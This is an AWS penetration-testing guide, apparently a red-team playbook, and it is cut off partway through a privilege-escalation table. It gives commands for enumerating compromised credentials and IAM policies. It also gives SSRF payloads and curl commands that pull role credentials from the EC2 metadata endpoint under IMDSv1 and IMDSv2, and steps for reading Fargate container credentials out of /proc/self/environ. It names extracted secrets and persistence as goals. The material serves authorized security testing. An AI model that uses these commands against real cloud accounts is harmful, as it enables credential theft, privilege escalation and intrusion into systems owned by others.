AWS Penetration Testing
Purpose
Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
Inputs/Prerequisites
- AWS CLI configured with credentials
- Valid AWS credentials (even low-privilege)
- Understanding of AWS IAM model
- Python 3, boto3 library
- Tools: Pacu, Prowler, ScoutSuite, SkyArk
Outputs/Deliverables
- IAM privilege escalation paths
- Extracted credentials and secrets
- Compromised EC2/Lambda/S3 resources
- Persistence mechanisms
- Security audit findings
---
Essential Tools
| Tool | Purpose | Installation | |------|---------|--------------| | Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` | | SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` | | Prowler | Security auditing | `pip install prowler` | | ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` | | enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` | | Principal Mapper | IAM analysis | `pip install principalmapper` |
---
Core Workflow
Step 1: Initial Enumeration
Identify the compromised identity and permissions:
# Check current identity
aws sts get-caller-identity
# Configure profile
aws configure --profile compromised
# List access keys
aws iam list-access-keys
# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...Step 2: IAM Enumeration
# List all users
aws iam list-users
# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER
# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER
# List inline policies
aws iam list-user-policies --user-name TARGET_USER
# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAMEStep 3: Metadata SSRF (EC2)
Exploit SSRF to access metadata endpoint (IMDSv1):
# Access metadata endpoint
http://169.254.169.254/latest/meta-data/
# Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Extract temporary credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
# Response contains:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2019-08-01T05:20:30Z"
}**For IMDSv2 (token required):**
# Get token first
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
"http://169.254.169.254/latest/api/token")
# Use token for requests
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"**Fargate Container Credentials:**
# Read environment for credential path
/proc/self/environ
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
# Access credentials
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH---
Privilege Escalation Techniques
Shadow Admin Permissions
These permissions are equivalent to administrator:
| Permission | Exploitation | |------------|--------------| | `iam:CreateAccessKey` | Create keys for admin user | | `iam:CreateLoginProfile` | Set password for any user | | `iam:AttachUserPolicy` | Attach admin policy to self | | `iam:PutUserPolicy` | Add inline admin policy | | `ia
<!-- truncated -->